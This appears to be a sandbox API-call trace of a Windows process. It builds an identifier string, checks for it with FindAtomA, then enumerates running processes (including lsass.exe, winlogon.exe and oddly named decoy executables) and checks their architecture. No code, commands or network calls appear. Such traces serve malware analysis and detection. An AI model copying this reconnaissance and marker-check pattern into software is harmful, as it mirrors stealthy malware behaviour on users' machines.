	[0073.490] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.490] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.490] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.491] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.491] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetLastError () returned 0x5
	[0073.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.492] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.492] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.492] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.493] CloseHandle (hObject=0x224) returned 1
	[0073.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.493] CloseHandle (hObject=0x224) returned 1
	[0073.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.493] CloseHandle (hObject=0x224) returned 1
	[0073.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.535] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.540] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.540] CloseHandle (hObject=0x224) returned 1
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.541] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.541] CloseHandle (hObject=0x224) returned 1
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.541] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.541] CloseHandle (hObject=0x224) returned 1
	[0073.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.542] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.542] CloseHandle (hObject=0x224) returned 1
	[0073.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.542] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.542] CloseHandle (hObject=0x224) returned 1
	[0073.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.542] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.542] CloseHandle (hObject=0x224) returned 1
	[0073.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.542] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.542] CloseHandle (hObject=0x224) returned 1
	[0073.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.542] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.542] CloseHandle (hObject=0x224) returned 1
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.543] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.543] CloseHandle (hObject=0x224) returned 1
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.543] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.543] CloseHandle (hObject=0x224) returned 1
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.543] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.543] CloseHandle (hObject=0x224) returned 1
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.544] CloseHandle (hObject=0x224) returned 1
	[0073.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.544] CloseHandle (hObject=0x224) returned 1
	[0073.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.544] CloseHandle (hObject=0x224) returned 1
	[0073.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a18, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.544] CloseHandle (hObject=0x224) returned 1
	[0073.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e770, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.545] CloseHandle (hObject=0x224) returned 1
	[0073.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.545] CloseHandle (hObject=0x224) returned 1
	[0073.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.545] CloseHandle (hObject=0x224) returned 1
	[0073.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.545] CloseHandle (hObject=0x224) returned 1
	[0073.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728978, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
